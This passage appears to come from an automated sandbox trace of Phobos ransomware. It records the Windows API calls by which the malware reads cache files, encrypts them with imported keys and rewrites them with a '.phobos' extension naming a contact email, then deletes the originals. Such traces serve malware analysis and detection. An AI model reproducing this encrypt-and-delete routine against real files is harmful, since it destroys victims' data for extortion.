dwFlags=0x0) returned 1 [0196.197] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.197] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.197] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.197] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.197] CloseHandle (hObject=0x154) returned 1 [0196.198] CloseHandle (hObject=0x14c) returned 1 [0196.198] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d")) returned 1 [0196.198] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.201] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1763) returned 1 [0196.201] CloseHandle (hObject=0x14c) returned 1 [0196.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6")) returned 0x2024 [0196.201] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.201] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.201] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.202] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.202] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.202] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6e3, lpOverlapped=0x0) returned 1 [0196.248] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0) returned 1 [0196.248] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6f0, lpOverlapped=0x0) returned 1 [0196.249] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.249] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.249] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.249] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.249] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.249] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.249] CloseHandle (hObject=0x14c) returned 1 [0196.249] CloseHandle (hObject=0x154) returned 1 [0196.249] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_0a9bfdd75b598c2110cbf610c078e6e6")) returned 1 [0196.250] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.251] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1763) returned 1 [0196.251] CloseHandle (hObject=0x154) returned 1 [0196.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd")) returned 0x2024 [0196.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.252] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.252] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.306] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.306] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6e3, lpOverlapped=0x0) returned 1 [0196.308] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0) returned 1 [0196.308] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6f0, lpOverlapped=0x0) returned 1 [0196.309] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.309] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.309] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.309] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.309] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.309] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.309] CloseHandle (hObject=0x154) returned 1 [0196.309] CloseHandle (hObject=0x14c) returned 1 [0196.309] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd")) returned 1 [0196.310] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.311] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1763) returned 1 [0196.311] CloseHandle (hObject=0x14c) returned 1 [0196.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f")) returned 0x2024 [0196.311] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.311] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.311] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.312] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.312] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.312] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6e3, lpOverlapped=0x0) returned 1 [0196.313] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0) returned 1 [0196.314] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6f0, lpOverlapped=0x0) returned 1 [0196.314] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0196.314] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.314] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.315] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.315] WriteFile (in: hFile=0x154, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.315] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.315] CloseHandle (hObject=0x14c) returned 1 [0196.315] CloseHandle (hObject=0x154) returned 1 [0196.315] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f")) returned 1 [0196.316] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.317] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1763) returned 1 [0196.317] CloseHandle (hObject=0x154) returned 1 [0196.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416")) returned 0x2024 [0196.317] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0196.317] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.317] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.317] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.318] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.318] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.318] ReadFile (in: hFile=0x154, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6e3, lpOverlapped=0x0) returned 1 [0196.319] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0) returned 1 [0196.319] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6f0, lpOverlapped=0x0) returned 1 [0196.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0196.320] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.320] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.320] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.320] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.321] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.321] CloseHandle (hObject=0x154) returned 1 [0196.321] CloseHandle (hObject=0x14c) returned 1 [0196.321] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416")) returned 1 [0196.322] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.322] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c 